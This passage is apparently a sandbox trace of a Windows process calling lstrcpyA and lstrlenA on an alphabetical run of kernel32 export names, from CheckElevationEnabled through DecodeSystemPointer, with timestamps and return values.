returned="CheckElevationEnabled" [0083.793] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0083.793] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0083.793] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0083.793] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0083.793] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0083.794] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0083.794] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0083.794] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0083.794] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0083.794] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0083.794] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0083.794] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0083.794] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0083.794] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0083.794] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0083.794] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0083.794] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0083.794] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0083.794] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0083.794] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0083.794] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0083.794] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0083.794] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0083.794] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0083.794] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0083.794] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0083.794] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0083.794] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0083.794] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0083.794] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0083.794] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0083.794] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0083.794] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0083.794] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0083.794] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0083.794] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0083.794] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0083.794] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0083.794] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0083.794] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0083.794] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0083.794] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0083.794] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0083.795] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0083.795] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0083.795] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0083.795] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0083.795] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0083.795] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0083.795] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0083.795] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0083.795] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0083.795] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0083.795] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0083.795] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0083.795] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0083.795] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0083.795] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0083.795] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0083.795] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0083.795] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0083.795] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0083.795] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0083.795] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0083.795] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0083.795] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0083.795] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0083.795] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0083.795] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0083.795] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0083.795] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0083.795] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0083.795] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0083.795] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0083.795] lstrlenA (lpString="COPYCONTEXT") returned 11 [0083.795] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0083.795] lstrlenA (lpString="COPYFILEA") returned 9 [0083.795] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0083.795] lstrlenA (lpString="COPYFILEEXA") returned 11 [0083.795] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0083.795] lstrlenA (lpString="COPYFILEEXW") returned 11 [0083.796] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0083.796] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0083.796] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0083.796] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0083.796] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0083.796] lstrlenA (lpString="COPYFILEW") returned 9 [0083.796] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0083.796] lstrlenA (lpString="COPYLZFILE") returned 10 [0083.796] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0083.796] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0083.796] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0083.796] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0083.796] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0083.796] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0083.796] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0083.796] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0083.796] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0083.796] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0083.796] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0083.796] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0083.796] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0083.796] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0083.796] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0083.796] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0083.796] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0083.796] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0083.796] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0083.796] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0083.796] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0083.796] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0083.796] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0083.796] lstrlenA (lpString="CREATEEVENTA") returned 12 [0083.796] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0083.796] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0083.796] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0083.796] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0083.796] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0083.797] lstrlenA (lpString="CREATEEVENTW") returned 12 [0083.797] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0083.797] lstrlenA (lpString="CREATEFIBER") returned 11 [0083.797] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0083.797] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0083.797] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0083.797] lstrlenA (lpString="CREATEFILEA") returned 11 [0083.797] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0083.797] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0083.797] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0083.797] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0083.797] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0083.797] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0083.797] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0083.797] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0083.797] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0083.797] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0083.797] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0083.797] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0083.797] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0083.797] lstrlenA (lpString="CREATEFILEW") returned 11 [0083.797] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0083.797] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0083.797] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0083.797] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0083.797] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0083.797] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0083.797] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0083.797] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0083.797] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0083.797] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0083.797] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0083.797] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0083.797] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0083.797] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0083.797] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0083.797] lstrlenA (lpString="CREATEJOBSET") returned 12 [0083.797] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0083.798] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0083.798] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0083.798] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0083.798] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0083.798] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0083.798] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0083.798] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0083.798] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0083.798] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0083.798] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0083.798] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0083.798] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0083.798] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0083.798] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0083.798] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0083.798] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0083.798] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0083.798] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0083.798] lstrlenA (lpString="CREATEPIPE") returned 10 [0083.798] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0083.798] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0083.798] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0083.798] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0083.798] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0083.798] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0083.798] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0083.798] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0083.798] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0083.798] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0083.798] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0083.798] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0083.798] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0083.798] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0083.798] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0083.798] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0083.798] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0083.798] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0083.798] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0083.799] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0083.799] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0083.799] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0083.799] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0083.799] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0083.799] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0083.799] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0083.799] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0083.799] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0083.799] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0083.799] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0083.799] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0083.799] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0083.799] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0083.799] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0083.799] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0083.799] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0083.799] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0083.799] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0083.799] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0083.799] lstrlenA (lpString="CREATETHREAD") returned 12 [0083.799] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0083.799] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0083.799] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0083.799] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0083.799] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0083.799] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0083.799] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0083.799] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0083.799] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0083.799] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0083.799] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0083.799] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0083.802] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0083.802] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0083.802] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0083.802] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0083.802] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0083.802] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0083.802] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0083.802] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0083.802] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0083.802] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0083.802] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0083.803] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0083.803] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0083.803] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0083.803] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0083.803] lstrlenA (lpString="CTRLROUTINE") returned 11 [0083.803] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0083.803] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0083.803] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0083.803] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0083.803] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0083.803] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0083.803] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0083.803] lstrlenA (lpString="DEBUGBREAK") returned 10 [0083.803] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0083.803] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0083.803] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0083.803] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0083.803] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0083.803] lstrlenA (lpString="DECODEPOINTER") returned 13 [0083.803] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0083.803] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0083.803] lstrcpyA (in: lpString1=0x3f2d468, 